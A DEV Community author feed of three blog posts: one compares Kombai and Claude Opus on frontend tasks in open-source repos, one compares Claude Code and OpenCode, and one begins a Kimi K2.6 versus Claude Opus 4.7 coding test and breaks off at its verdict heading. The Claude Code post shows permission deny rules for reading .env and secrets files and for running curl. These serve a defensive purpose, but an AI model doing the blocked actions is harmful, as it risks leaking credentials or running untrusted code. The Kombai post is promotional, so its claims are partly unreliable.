DEV Community: Shrijal Acharya

Claude Opus vs Kombai in 3 Real-World Frontend AI Tests 🚀

Shrijal Acharya — Tue, 02 Jun 2026 16:06:41 +0000

Frontend automation has been getting pretty wild lately. 🫠

A few months ago, this comparison would have been much easier to frame.

On one side, you had the Claude Opus lineup, one of the strongest coding model lineups available, running through tools like Claude Code with Figma MCP support.

On the other side, you had Kombai, a frontend-focused AI coding agent that was mostly known for turning Figma files, screenshots, prompts, and existing designs into clean frontend code.

But Kombai has changed quite a bit since then.

It is not just an AI coding agent for frontend anymore. With the newer updates, especially Design Mode, Kombai is now trying to cover a much bigger part of the frontend workflow.

That changes the comparison a little.

If we only compare it on code generation, we are kind of testing just one part of what Kombai does now. It can also help create UI designs, iterate on them visually, and then move those designs into code inside the same IDE workflow.

I will go deeper into that later in the Kombai section, because there is quite a bit to talk about there.

For this post, though, I still want to focus mainly on the part that matters most in real projects:

🤔 Can it work inside an existing codebase and ship good frontend changes without breaking things?

Because at the end of the day, that's the actual pain point of frontend.

If you’re interested, we already compared the older version of Kombai and Figma MCP here: Figma MCP vs Kombai

So in this post, we’ll look at what has changed with Kombai, touch on Design Mode, and then compare it with Claude Opus on 3 real open-source projects.

Let’s find out which one actually feels more useful. 👇

TL;DR

If you just want the takeaway, here’s the quick rundown:

Kombai is not just a Figma-to-code tool anymore. It is now more of an all-in-one design and frontend coding agent. You can generate designs, iterate on a canvas, visually edit UI, use Figma as input, work with your real codebase, and then ship great frontend code from inside your IDE.

Design Mode is the biggest new change. It gives Kombai an infinite canvas, Style Guides, Themes, reusable Blocks, CSS-level visual editing, and a one-click flow from design to code. It is still early, but it changes how you should think about Kombai.

For the coding tests in this post, Kombai was still clearly stronger overall. In real open-source projects, it handled frontend implementation, codebase understanding, UI quality, and integration better than Claude Opus in most cases.

Claude Opus 4.6 with Figma MCP is still totally fine, especially if you already work mostly in the CLI with tools like Claude Code, Codex, or whatever else. You can absolutely stick with that setup and still get solid results. It works well.

The bigger point is this:

If you are already comfortable in the CLI, there is no real reason to switch just for this. A good model with Figma MCP is more than enough for a lot of use cases.

But if you use Cursor, VS Code, Windsurf, Trae, Antigravity, Kiro, or another GUI IDE, you should seriously try Kombai at least once.

It is just a very good tool for frontend work.

I’ve been using Kombai for more than 10 months, and it still feels kind of wild sometimes. Honestly, I have Cursor installed on my machine for Kombai alone. That’s how useful it has been for me.

Brief on Kombai

💁 Kombai is an all-in-one design and frontend coding agent for building production-ready frontends

Kombai used to be easy to describe as a frontend AI agent.

This is still true, but now its just a small part of what it can do.

The better way to describe it today is this:

It's an agent specially designed for frontend unlike usual coding agents like Claude Code, Codex or anything else.

That specialization shows up in a few places:

It understands frontend stacks and component libraries
It can parse Figma designs natively
It can work with existing components, tokens, hooks, and design systems
It can visually inspect and edit the browser output
It can generate UI designs before writing code
It focuses more on production-ready frontend changes, and not a generic app generation

The biggest recent update is the Design Mode.

With Design Mode, Kombai can generate UI designs directly inside your IDE. You can start from a prompt, image, website, or Figma reference, and Kombai creates editable UI designs that you can change visually.

Here’s a quick demo of Kombai’s Design Mode in action by Beau Carnes (core team member of freeCodeCamp).

It also has proper design-system-ish primitives now:

Style Guides for controlling the overall visual direction
Themes for reusable design tokens
Blocks for reusable design elements
Variants for trying multiple design directions
A CSS editor for visual tweaks
and many more...

These designs live as .canvas files in your repo, which means they can be version-controlled with git like your code.

Once you like a design, you can hit Code design, and Kombai moves it into Code Mode, reads your project, understands your stack, reuses relevant components and tokens, and codes it into working frontend.

That is what makes it feel different from tools like v0, Lovable, or Bolt.

Those tools are great for generating prototypes or apps from scratch. Kombai is more focused on your existing frontend repo. It works inside your editor and tries to build the thing using the stack you already have.

Check out this intro demo Kombai 2.0. The first AI design engineer.

// Detect dark theme var iframe = document.getElementById('tweet-2061825199247614316-192'); if (document.body.className.includes('dark-theme')) { iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=2061825199247614316&theme=dark" }

With Kombai, you can not only create designs, but also get the safety of knowing that no backend code is ever touched, which ensures your business logic is not mistakenly changed.

You can add it right inside your editor. It works with VSCode, Cursor, Windsurf, and Trae. Just grab it from the extension marketplace, launch it, and you’re ready to go.

With Kombai, you can:

Generate UI designs from scratch using Design Mode.
Turn Figma designs into code without setting up Figma MCP separately.
Turn Figma designs into code (React, HTML, CSS, etc.) using the component library your project already uses.
Use screenshots, images, websites, or natural language as input.
Reuse existing components, hooks, design tokens, and frontend conventions from your repo.
Visually inspect and edit your UI through the Kombai Browser.
Work with a frontend-smart engine that understands 30+ libraries, including Next.js, MUI, and Chakra UI.
Most importantly, preview the changes in a sandbox so you can approve or reject the change before committing it to the files.

Head to the docs to get started and find the setup for your editor.

You can be up and running in under a minute:

Install the extension for your editor
Sign in and connect your project
Pick the mode you need: Code, Plan, Design, etc.
Paste a Figma link or describe what you want to build
Paste a Figma link, describe what you want, attach an image, or work from your existing code
Review the output and commit your code

If you spend most of your time on the frontend, this is a no-brainer.

Now comes with 100 award winning landing pages that you can make your own.

// Detect dark theme var iframe = document.getElementById('tweet-2061825201730695550-647'); if (document.body.className.includes('dark-theme')) { iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=2061825201730695550&theme=dark" }

One Important Note Before the Tests

Kombai now has a much bigger features and design support than it did before.

But this post is still mainly a frontend coding and implementation comparison.

So, I am not going to deeply test Design Mode here. That deserves its own separate post because the right comparison there would probably be against tools like v0, Lovable, Bolt, and maybe Figma-based workflows.

For this post, the test is still:

Can it understand a real codebase?
Can it preserve functionality?
Can it implement a feature cleanly?
Can it match or improve UI quality?
Importantly, can it work in a large real-world existing project?

That is exactly what we are going to test here.

Test Workflow

In this model test, I’ll be using Claude Opus 4.6 with everyone’s favorite CLI coding agent, Claude Code, along with Figma MCP support.

💁 Just in case you're interested in how to add MCP support to Claude Code, you can view the guide here.

For Kombai, the choice mostly comes down to the IDE, so I’ll go with Cursor. It does not really matter much which IDE you use, though. VS Code would work just fine too.

We’ll test both tools on three decently complex tasks in real-world open-source projects with hundreds of thousands of LOC.

A frontend-heavy task with Figma
A frontend + backend task with more implementation complexity
A task that relies more on codebase understanding than implementation complexity

I’ll compare both tools on:

time to complete the task
quality of the code
how closely the final output matches the given design or feature intent

💡 Note: I’ll share the source code changes for each task from both tools in a .patch file. That way, you can easily reproduce them on your local system by cloning the repository and applying the patch with git apply <path_file_name>.

Note: As I’m using a Claude plan and not API usage, price is roughly estimated based on the output tokens.

Real-World Coding Comparison

The entire test in this blog is going to be on top of real-world open-source projects that are used by thousands of people, not toy projects, but ones with thousands of LOC.

All three tests are going to be on 3 different projects, all open-source, of course!

Let's start with an easier one, a shadcn template repository with Figma MCP.

Test 1: Rebuild an Open-Source Project UI (with Figma MCP)

For this test, I'll be comparing both of them on a Figma file, giving them access to a Figma MCP server.

You can find the Figma design template for this test here: Dashboard

Prompt:

Implement the provided Figma dashboard design in this existing Next.js + shadcn/ui dashboard codebase.

<figma_url>

Constraints:

1. Preserve all existing functionality exactly.
2. Do not break routing, state, existing interactions, or responsiveness.
3. Replace the current dashboard presentation layer with a UI that closely matches the Figma design.
4. The Figma is food-delivery themed. Translate only the content domain, not the visual system.
5. Keep the layout, structure, and styling language of the Figma as intact as possible.
6. Replace food-specific labels and data with content that fits a generic admin dashboard.
7. Reuse existing logic and data bindings wherever possible.
8. Avoid adding fake backend logic.
9. Keep the implementation production-quality and componentized.

Focus areas:

- sidebar
- header/top bar
- summary metric cards
- chart section
- table/list section
- filters/search/actions if present

Claude Opus 4.6 (with Figma MCP)

Here's the response from Claude Opus 4.6:

You can find the code it generated here: Opus 4.6 source Code

Opus did a pretty good job here.

Given the Figma itself was not even made for a generic admin dashboard in the first place, there was obviously some room where it had to improvise a bit on its own.

But the main thing I was testing for here was not just whether it could make the frontend look close enough. The actual ask in the prompt was to preserve and support the existing functionalities as well. That part just was not really there. It did not add the interactivity support properly, which was the whole point of the test after all.

So visually, sure, it looks alright. But if the interaction layer is missing, that is a pretty big miss for this kind of task. If it had nailed that part too, this would have been a really strong result. But it didn’t.

Output token Cost: ~$0.125
Duration: 9 minutes 1 second
Output Token Usage: ~8K
Code Changes: 6 files changed, 420 insertions(+), 422 deletions(-)

Kombai

Here's the response from Kombai:

You can find the code it generated here: Kombai source Code

Kombai nailed this one. Even better how accurately it finds out the tech stack.

The frontend turned out really good. More importantly, the interactivity is there, which is the main thing being tested other than how close it comes to the Figma design. It actually respected the fact that this is an existing app, with behavior that still needs to work.

And if I compare both the UI itself and the overall build quality from a production POV, Kombai clearly did better here.

That said, there was one issue I noticed while working with Kombai.

After it finishes the implementation, it has this nice default feature where it opens up a browser preview and lets you chat there to fix smaller things quickly. In theory, that sounds great. In practice, for apps that require authentication, which this one did, it falls apart. Google OAuth simply flags it as unsafe, so you cannot log in there at all.

So yeah, they definitely need to work on that.

Still, overall, the user experience and the actual result were top notch.

Duration: ~12 minutes
Code Changes: 12 files changed, 940 insertions(+), 532 deletions(-)

I noticed the project also has standalone Kanban board support, so why not quickly test it on this as well?

Prompt:

Completely refactor the Kanban board UI in this open source project based on this Figma:

<figma_url>

This should be a real UI redesign, not minor styling tweaks. Study the Figma closely and make the board feel much more polished, modern, clean, and cohesive. Improve layout, spacing, typography, hierarchy, cards, columns, controls, interaction states, and responsiveness.

Preserve functionality, but refactor components and styling where needed so the code is cleaner and the design is more consistent. Focus heavily on UI quality and make the final result feel much closer to the Figma overall.

Claude Opus 4.6 (with Figma MCP)

Here's the response from Claude Opus 4.6:

You can find the code it generated here: Opus 4.6 source Code

Opus did pretty well here too.

The good part is that functionality was not broken. The board still works, and that matters a lot for a refactor like this. The redesign itself is also nice. It is clearly better than before.

That said, if I look closely at the actual design match, it seems to miss a little here and there. It does not feel quite as locked in to the Figma as the best result should.

Cost: negligible
Duration: 5 minutes 26 seconds
Code Changes: 5 files changed, 162 insertions(+), 56 deletions(-)

Kombai

Here's the response from Kombai:

You can find the code it generated here: Kombai source Code

Again, Kombai was excellent here.

Honestly, this one came out awesome. It matches the Figma really well, preserves the expected behavior, and feels like a proper redesign.

Code Changes: 4 files changed, 362 insertions(+), 72 deletions(-)
Duration: ~6 minutes

Test 2: Add a Feature in Uptime Kuma

There's this open-source project that's super popular for the self-hosted monitoring service Uptime Kuma, with over 84K stars on GitHub.

Here's an existing issue on the project that we will try to build: Calendar Graph

Prompt:

Add a heatmap-style uptime history section to the public status page in this existing Uptime Kuma codebase.

Constraints:

1. Keep all existing functionality working.
2. Do not break the public status page, responsiveness, or current monitor behavior.
3. Build this as a proper feature inside the existing architecture.
4. Reuse existing logic and data flow wherever possible.
5. Avoid fake backend logic or hardcoded mock data.
6. Make the heatmap work independently for each service.
7. Keep the UI consistent with Uptime Kuma’s existing style.
8. Make the implementation clean and production-ready.

Focus areas:

- status page
- per-service uptime history
- heatmap UI
- state management
- backend integration

Claude Opus 4.6 (with Figma MCP)

Here's the response from Claude Opus 4.6:

You can find the code it generated here: Opus 4.6 source Code

Opus actually got the overall feature in place, and to be fair, the core thing does work.

That said, there is a bug.

When you try to change the monitoring duration for one service, it also changes it for all the others. That is obviously not how this should behave, and for a feature like this, that kind of state handling bug is a big issue, of course!

Other than that, there is not a whole lot to complain about. The core functionality works, just with some caveats, and that feels fair. I do not think it is realistic to expect the model to get every detail perfectly right in one shot on a non-trivial codebase.

Output token Cost: ~$0.12
Duration: 13 minutes 5 seconds
Output Token Usage: ~7.5K
Code Changes: 4 files changed, 784 insertions(+)

Kombai

Here's the response from Kombai:

You can find the code it generated here: Kombai source Code

Kombai did this one properly.

The feature is implemented correctly, the behavior is right, and even the bug that showed up in the Claude Opus implementation is not there at all.

That part matters because this is not just about working on the UI. It's about putting the feature into an existing project.

Duration: ~10 minutes
Code Changes: 4 files changed, 809 insertions(+), 1 deletion(-)

Test 3: Add a Feature to Chatwoot

This is a little different from the other two tests.

This was more of a test to see how well the model actually understands the codebase and less about generating or working on the UI heavily. The code change isn't going to be huge, but it tests the two on how good they are at understanding the codebase and adding a feature on top.

Prompt:

Add a new "Participating" tab to the chat/conversation list in this existing Chatwoot codebase.

The goal is to let users quickly view conversations they are participating in, while keeping the implementation fully aligned with how Chatwoot already handles conversations, tabs, filtering, permissions, and dashboard state.

Constraints:

1. Preserve all existing functionality exactly.
2. Do not break existing conversation list behavior, routing, filters, permissions, or dashboard interactions.
3. Add "Participating" as a proper tab in the existing chat list UI, not as a separate temporary view.
4. Make sure the tab only shows conversations the current user is participating in.
5. Reuse existing backend, frontend, and store patterns wherever possible.
6. Avoid hacks, fake data, or disconnected logic.
7. Keep the implementation production-quality and consistent with the current Chatwoot UI.
8. Ensure permissions and visibility rules continue to work correctly.
9. Make the feature feel like a native part of the product.

Focus areas:

- chat list tab integration
- conversation filtering
- backend query support
- participation-based logic
- store/state updates
- correct tab placement in the UI

Claude Opus 4.6 (with Figma MCP)

Here's the response from Claude Opus 4.6:

You can find the code it generated here: Opus 4.6 source Code

Opus nailed this one.

This is exactly the kind of test where you are not making massive frontend changes, but instead need a solid understanding of how the app actually works so the feature fits naturally into the existing codebase.

The only issue I noticed was some UI flickering. But that looked more like a minor issue than anything wrong with the feature implementation itself.

Other than that, it worked perfectly.

Output token Cost: ~$0.02
Duration: 12 minutes
Output Token Usage: ~1.3K
Code Changes: 13 files changed, 52 insertions(+), 11 deletions(-)

Kombai

Here's the response from Kombai:

You can find the code it generated here: Kombai source Code

There was no flickering here, and Kombai also placed everything where it actually made sense. Claude got the logic right too, but the tab placement felt a bit off. Kombai just tied it together better, and the whole thing felt a bit cleaner.

So overall, both did well here, but Kombai’s result felt cleaner and better integrated.

Code Changes: 7 files changed, 30 insertions(+), 9 deletions(-)
Duration: ~8 minutes

Final Verdict

So, what’s the takeaway?

After testing both on real tasks in real codebases, Kombai was clearly stronger for frontend work.

That is not to say Claude Code with Opus 4.6 is bad. Far from it.

It is one of the strongest coding models available right now, and it can do some serious work. In some cases, especially the Chatwoot test, it understood the codebase really well and shipped something that was genuinely solid.

Claude Opus lineup is too good for general coding.

Kombai is a frontend specialized tool.

And for frontend-heavy work, that specialization really shows.

That said, I do not think you should take my word for it blindly.

Also, this does not mean Kombai will win every project or every workflow.

If you are doing backend-heavy work, infra changes, full-stack architecture, or mostly CLI-based development, Claude Code still makes a ton of sense.

The design side is also getting more interesting now. I did not fully test Design Mode in this post, because that deserves a separate comparison.

Honestly, the best way to judge tools like this is to try them yourself. A comparison like this can give you a rough idea, but it really clicks only when you use them on your own codebase and see how they actually feel.

That’s all for this one. Thank you for reading! ✌️

Claude Code vs. OpenCode without the hype

Shrijal Acharya — Thu, 21 May 2026 13:55:18 +0000

Everyone wants a coding agent now.

Not a chatbot that explains code.

An actual agent that can read your repo, edit files, run commands, use tools, and keep moving while you supervise.

Claude Code and OpenCode are two of the most interesting takes on that idea.

Claude Code is the polished Anthropic-native route.

OpenCode is the open-source route for people who want more model choice, more control, and a setup they can tweak.

And that difference matters more than it looks.

What is OpenCode

ℹ️ Open-source coding agent with model and tool control

OpenCode is an open-source coding agent for developers who want more control over their AI coding setup.

It runs in the terminal, IDE, and desktop, and lets you bring your own model instead of locking you into one provider. Claude, GPT, Gemini, local models, and 75+ other providers are supported. That is probably the biggest reason people care about it.

It also comes with the things you expect from a serious coding agent now: LSP support, multi-session workflows, project memory through AGENTS.md, MCP tools, custom agents, plugins, and editor support, and maybe a bunch more.

So the pitch is not just “AI in your terminal.”

That undersells it.

OpenCode is closer to a coding-agent workbench. You bring the model, the provider, the editor, the agents, and the workflow. OpenCode gives you the open layer that ties it all together.

Not everyone needs that level of control.

But some developers absolutely do.

💁 OpenCode is for developers who want to tweak every single detail of their coding agent.

That is what makes it interesting next to Claude Code.

What is Claude Code

ℹ️ Anthropic’s polished coding agent for your terminal.

Claude Code is Anthropic’s coding agent that lives in your terminal.

The idea is pretty same here, it can read your codebase, edit files, run commands, handle Git stuff, and all through prompts.

The big difference is that Claude Code is built around Claude.

That sounds obvious, but it matters.

You are not coming here to mix and match ten different model providers. You are coming here because you trust Anthropic’s models, and you want the cleanest experience around them.

Claude Code also comes with a lot of serious agent features: project memory through CLAUDE.md, slash commands, permissions, hooks, MCP, plugins, custom subagents, and IDE integrations.

Claude Code is closer to a Claude-native coding environment. The model, the agent loop, the tool use, the permissions, and the workflow all come from the same Anthropic-shaped box.

Less DIY.

But there is also a small shift happening.

Some developers are starting to move from Claude Code to OpenCode or OpenAI’s Codex for one simple reason: usage limits.

Claude Code is great, but when you are deep in a coding session, hitting limits feels brutal. And for heavier users, even the $200 Claude Max plan does not always feel like enough.

That is why OpenCode and Codex are tempting. Also read: Claude Code vs. Codex: Detailed breakdown

When Claude hits the wall, people still need a way to keep shipping.

💁 If you're an Anthropic fanboy, and don't care about other models, stick to Claude Code.

High Level Architecture

ℹ️ How both the agents work

At a high level, both OpenCode and Claude Code follow the same basic agent loop.

You give it a task.

It looks at the repo.

It decides what files, commands, or tools it needs.

It takes an action.

Then it reads the result and keeps going.

ℹ️ This is the highest-level architecture of a coding agent. A few details change from tool to tool.

That loop is the boring part.

The interesting part is everything around it.

Here is a tiny example of that loop in practice.

I gave Claude Code and OpenCode the same small task in a demo word-count repo:

Add a --json flag to a word-count CLI, update the tests, and run them.

The interesting part is not the feature. It is watching both agents go through the same shape: understand the repo, plan the change, edit the files, and run the tests.

Claude Code wraps that loop in Anthropic’s own product system. You get Claude, project memory through CLAUDE.md, permissions, hooks, MCP, plugins, Claude skills, and subagents in one single setup.

OpenCode takes a more open route. It gives you the agent runtime, but lets you bring different models, providers, agents, tools, and workflows. Its docs split agents into primary agents and subagents, and let you configure specialized assistants with custom prompts, models, and tool access.

So architecturally, the difference is not that one is an agent and the other is not.

They both are.

The real difference is who controls the harness around the agent.

Claude Code gives you Anthropic’s harness.

OpenCode gives you a harness you can inspect, and configure.

Context, memory and tool use

Both Claude Code and OpenCode are doing the same basic thing: they build a giant prompt, stuff it with repo context, tool definitions, memory files, recent messages, and tool results, then ask the model what to do next.

The difference is how much of that system you control.

Claude Code is more vertically integrated here. It is built around Anthropic models, so it can take advantage of Anthropic-specific stuff like prompt caching, native tool calls, and Claude’s own long-context behavior.

That matters.

Tool definitions, system prompts, and CLAUDE.md can be cached between turns, which makes long coding sessions cheaper and faster than they would be if Claude had to re-read everything from scratch every single time.

OpenCode takes a different route.

It does not assume one model or one provider. Instead, it reads the model’s context limit from the provider metadata and builds the session around that. So the same OpenCode setup can run with Claude, GPT, Gemini, Qwen, local models, or whatever else you plug in.

That flexibility is the whole point.

But it also means OpenCode has to normalize all the weird provider differences: tool call IDs, cache support, model limits, and tool-calling parts.

Claude Code gets to optimize deeply for Claude.

OpenCode has to work with everyone.

Memory works the same way.

Claude Code uses CLAUDE.md as the main project memory file. It can also load nested CLAUDE.md files, user-level memory, and auto-memory. So it feels more like the agent has a built-in memory system.

OpenCode uses AGENTS.md.

That is more portable. You can commit it to the repo, share it with the team, and use it as a general agent instruction file instead of something tied to one vendor. OpenCode can even fall back to CLAUDE.md, which makes migration easier.

At some point, every agent runs out of context.

Claude Code handles this by compacting the conversation. Older tool outputs are cleared first, then the session gets summarized if needed. That is why Claude Code has commands like /context and /compact.

OpenCode is a bit more explicit. It checks whether the session is close to the model’s context limit, keeps a buffer for output, and then prunes old tool outputs before doing a full summary. The important bit is that OpenCode stores the raw history in SQLite, so pruning does not mean the data is gone forever.

Tool use follows the same pattern.

Claude Code gives you a polished default toolbelt: read, write, edit, grep, glob, bash, web fetch, todo tracking, MCP, hooks, skills, and subagents.

OpenCode gives you a smaller but more configurable tool system: read, write, edit, patch, bash, grep, glob, web fetch, task, todo, skills, MCP, custom tools, and experimental LSP support.

The difference is who controls the tool layer.

Subagents and task delegation

Subagents are basically how coding agents avoid stuffing everything into one giant conversation.

Instead of making the main agent do every task itself, it can delegate a smaller job to another agent with its own context window, prompt, tools, and permissions.

Claude Code and OpenCode both follow the same basic pattern here.

The parent agent calls a Task or task tool.

A child agent spins up.

It does the work in isolation.

Then it returns one final message back to the parent.

Main Agent
  |
  | calls Task / task
  v
Subagent
  - own context window
  - own prompt
  - own tools
  - own permissions
  |
  | returns final result only
  v
Main Agent continues...

That part is important. The parent usually does not see the full subagent conversation. It gets the result, not the whole reasoning.

Claude Code has the more polished version of this.

It ships with built-in agents like Explore, Plan, and general-purpose. Explore is mostly read-only and useful for repo research. Plan helps gather context during planning. general-purpose is for broader work.

You can also define custom agents in .claude/agents/ with YAML frontmatter for things like tools, model, permissionMode, maxTurns, skills.

That means you can do stuff like:

Use a fast Haiku-style agent for repo search.

Use a stronger model for code review.

OpenCode has a similar shape, but it is more transparent.

It has primary agents and subagents. Primary agents handle the main chat, while subagents are called through the task tool or @ mentions.

Custom agents can live in .opencode/agents/*.md or inside opencode.json, with fields like mode, model, temperature, steps, prompt, and permission.

The interesting part is that OpenCode stores subagents as real child sessions in SQLite. So delegation is not just a hidden prompt trick. It is represented in the session model with its own messages, permissions, and snapshots.

That fits OpenCode’s whole philosophy.

Claude Code gives you a cleaner subagent experience.

OpenCode gives you a more inspectable one.

Permissions, safety, and control

This is where the two are very different.

Claude Code is more conservative by default. It has permission modes, allow/ask/deny rules, hooks, and sandboxing around Bash.

So you can allow boring commands like tests, deny obvious footguns like .env reads or curl | sh, and ask before anything risky.

The important part is that Claude Code has multiple safety layers.

Permissions decide what Claude is allowed to do.

Something like:

{
  "permissions": {
    "allow": ["Bash(npm run test *)", "Bash(git status *)"],
    "deny": ["Read(./.env)", "Read(./secrets/**)", "Bash(curl *)"]
  }
}

Hooks can intercept tool calls before or after they run and sandboxing gives Bash an OS-level boundary.

OpenCode is simpler.

Most of the control lives in one permission object inside opencode.json. You can set rules for bash, edit, read, task, webfetch, and other tools from the same place.

That is clean, but OpenCode is also more permissive by default. You are expected to configure the rules yourself.

Something like:

{
  "permission": {
    "*": "ask",
    "bash": {
      "*": "ask",
      "git status *": "allow",
      "git push *": "deny",
      "rm *": "deny"
    },
    "edit": {
      "*": "deny",
      "packages/web/src/**/*.tsx": "ask"
    }
  }
}

It does have some smart checks, especially for Bash. OpenCode parses shell commands with tree-sitter (the same thing you have inside NeoVim), so it can detect risky commands like rm, mv, chmod, or paths outside the project more carefully than plain string matching.

But there is no native sandbox like Claude Code.

The bigger OpenCode power feature is plugins. Plugins can intercept tool execution, add custom tools, and change agent behavior.

That makes OpenCode way more hackable.

What the Claude Code leak tells us

The interesting part of the leak is what it showed about coding agents.

A lot of Claude magic is in the harness around the model: context management, tool descriptions, prompt caching, permissions, compaction, subagents, and the agent loop.

OpenCode does pretty much the same. It is not trying to clone some impossible model-level feature. It is trying to build a different harness around similar idea.

OpenCode’s advantage is that the harness is open, inspectable, and replaceable.

Another thing that's clear is that the future is not just about better models, but the system around them.

Better context control.

Better tool boundaries.

Better memory.

Better permissions.

That is why this comparison is even interesting. Claude Code and OpenCode are not just two CLIs. They are two different answers to the same question:

❓ How much of the agent stack should be final, and how much should developers be able to control?

So, which should you pick?

There is no clever answer here.

Pick Claude Code if you want the cleanest Claude-native coding agent experience.

Pick OpenCode if you want more control.

Personally, I still love Claude Code.

I really do.

Anthropic models are banger, especially for coding. The problem is that the limits have started to piss me off. When you are deep in a coding session and the limit hits, it completely breaks the flow.

But there is some relief now.

On May 6, Anthropic announced a new compute partnership with SpaceX and doubled Claude Code’s 5-hour limits for Pro, Max, Team, and seat-based Enterprise users. They also removed peak-time limits for Pro and Max users.

That makes Claude Code a lot easier to recommend again.

I am personally still mostly stuck with Claude Code because the experience is just that good.

But I use OpenCode when I want to try newer models like Kimi, OpenAI models, or local models. That is where OpenCode makes more sense to me. And by no means, it is to say that you can't use Anthropic models in OpenCode, you can, and that makes it even better.

Final thoughts

Claude Code and OpenCode are both useful, but for different reasons.

Claude Code is the one I’d pick if I just want the agent to work without thinking too much about setup. It feels cleaner, and better for getting into a repo quickly.

OpenCode is more for when you want control. Different models, different providers, more ways to shape the workflow around how you actually code.

I wouldn’t overthink it.

If you hate setup and love Anthropic, use Claude Code.

If you want more flexibility and less vendor lock-in, use OpenCode.

That’s really the whole comparison.

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

Kimi K2.6 vs. Claude Opus 4.7 in a Weird Game Coding Test ✅

Shrijal Acharya — Tue, 05 May 2026 13:04:03 +0000

Kimi K2.6 has been getting a lot of love lately, especially from devs who want a strong coding model without paying premium model prices every time they run a big prompt.

So I wanted to see how good this model actually is. But this time, I wanted to compare it with something much heavier, the developers darling Claude Opus 4.7.

On paper, Claude Opus 4.7 and Kimi K2.6 are very different models.

One is a premium frontier model from Anthropic. The other is Moonshot AI's much cheaper open model for coding and agentic tasks.

The pricing difference is pretty wild too. Claude Opus 4.7 costs $5/M input tokens and $25/M output tokens. Kimi K2.6 is listed at $0.95/M input tokens and $4/M output tokens, with cached input going even lower at $0.16/M tokens.

That is a pretty big gap.

So in this article, we'll see how the cheaper model, Kimi K2.6, does against Claude Opus 4.7.

For the test, I gave both models the same coding task: build a small Minetest (similar to Minecraft) bounty board with a TypeScript backend, then extend it with Google Sheets logging through Composio.

TL;DR

If you want the quick take, Claude Opus 4.7 clearly won this test, but it was painfully expensive.

Opus was better at the real task. The local build was cleaner, and it was the only one that got the real Google Sheets integration working.
Kimi did pretty well in Test 1. It got the local bounty board working for way less money, but it needed more debugging.
Test 2 changed the whole comparison. Opus was expensive, but it finished. Kimi just could not put it all together.

The cost difference was wild though.

For the first local bounty board test, Opus cost around $3.59, while Kimi came in at around $0.39. That is a huge gap. For the basic version, Kimi honestly did pretty well for the price.

But once the task got a little more real, the gap became way more obvious.

Opus got it working, even though it needed a little back and forth. The Google Sheets sync worked, and the project was modular enough that I could test the whole flow with two curl requests without even opening the game.

The painful part is that the Composio run alone cost $16 and took around 28min 52sec API time.

Kimi, on the other hand, burned 135k+ tokens, took around 25 minutes, cost around $5.03, and still did not really get any closer.

👀 So yeah, Kimi K2.6 is a usable and interesting cheaper model. But in this test, it could not really come close to Opus 4.7 for real-world coding.

Evaluation

I treated this like a real project, not a benchmark chart. Both models got the same prompts, and I compared the results based on whether it actually worked, how clean the code was, how much debugging it needed, how long it took, and how much it cost. That last one matters a lot here.

Setup

Same tasks and prompts for both models (Test 1: local-only bounty board, Test 2: real Composio Google Sheets sync).
Same target architecture: Minetest/Luanti Lua mod + TypeScript backend.
Same success criteria: /bounty flow works in-game, backend APIs behave correctly, and in Test 2 the completion is appended to Google Sheets via Composio.

What I measured

Functional correctness (most important): Did it work end-to-end with real verification?
- Local run: could a player generate, progress, and complete bounties without breaking state?
- Backend: did /health, /api/bounty/generate, /api/bounty/complete, and /api/leaderboard return the expected shapes?
- Test 2: did the Google Sheets append succeed, and could I validate it from the API without needing to be in the game?
Code quality and structure: modularity, clarity, and whether the repo was easy to reason about and test.
Debug burden: how many follow-ups were needed, how confusing the failure modes were, and whether issues were “real bugs” vs. “misconfiguration traps.”
Time: API time and wall time for each run.
Cost and token usage: input, output, cache behavior, and total run cost.
Practical ergonomics: whether I could validate quickly (for example, testing the full backend + Composio flow with curl).

How I verified outcomes

Test 1: ran the backend locally, joined a local Minetest world, used /bounty, and confirmed task tracking, rewards, and leaderboard persistence.
Test 2: verified the end-to-end sync by generating and completing a bounty via the backend API, and confirming a successful Google Sheets append through Composio.

Scoring approach

This was not a “unit test leaderboard” benchmark. It was a real build-and-ship check.

A model “wins” when the project works with minimal intervention.
A model “loses” when it cannot reach a working state in reasonable time/cost, even if parts of the code look promising.

Coding Test

For this test, I used the following CLI coding agents:

Claude Opus 4.7: Claude Code, Anthropic's terminal-based agentic coding tool

Kimi K2.6: OpenCode via OpenRouter

ℹ️ This is a practical coding test, so both models get the same prompt. I will compare time taken, code quality, token usage, cost, and all that stuff.

What are we building?

For this test, I wanted something small enough to verify properly, but still weird enough to show how each model handles an unusual idea.

So, we're building a simple Minetest/Luanti bounty board.

A player can join a local world, run /bounty, get a task like mining dirt or placing torches, and receive a reward after completing it.

After that, the backend records the completion, logs it to Google Sheets through Composio.

I get it, the concept is a little unusual on purpose.

Test Prompts

Both models received the same prompts for each test.

Test 1 Prompt: Local Bounty Board Prompt
Test 2 Prompt: Real Composio Integration Prompt

Test 1: Local Bounty Board

This first test is the basic version of the idea.

No external tools, no Composio. Just the game, the backend, and the local bounty flow working properly.

The goal was simple. A player runs /bounty, gets a task, completes it inside the game, and the backend tracks the progress without everything falling apart.

Claude Opus 4.7

Claude Opus 4.7 handled the first test really well.

The local bounty board worked end to end. It built the TypeScript backend, the Minetest/Luanti Lua mod, the command flow, progress tracking, rewards, and leaderboard persistence without needing a bunch of follow-up fixes.

The file structure also felt nice, which I had specifically asked for in the prompt:

The backend was built with Express, Zod, and Vitest. It also handled the boring stuff properly, which honestly matters a lot here:

npm test passed with 11/11 tests
npm run build passed cleanly
/health, /api/bounty/generate, /api/bounty/complete, and /api/leaderboard returned the right response shapes
incomplete bounty completions returned a clean 400

It created the Lua files cleanly, used minetest.request_http_api(), handled secure.http_mods, tracked digging and placing, stored player bounty state, and handled inventory rewards properly.

The whole run took around 12 minutes of API time, with about 23 minutes wall time. That is a bit longer than a quick web app build test, but for this kind of cross-stack project, it felt fair.

The cost came out to $3.59, which is definitely not cheap. But to be fair, the output was actually useful. It added a lot of code, but most of it was real implementation, not random filler like CONTRIBUTING.md, INSTALLATION.md, and all those extra files models sometimes create for no reason.

You can find the code it generated here: Claude Opus 4.7 Code

Here's the demo:

Cost: ~$3.59
Duration: 12min 3sec API time, 23min 53sec wall time
Code Changes: +1,688 lines, 0 lines removed
Token Usage:
- Input: 65
- Output: 54.8k
- Cache read: 2.8M
- Cache write: 129.8k

Quick Verdict

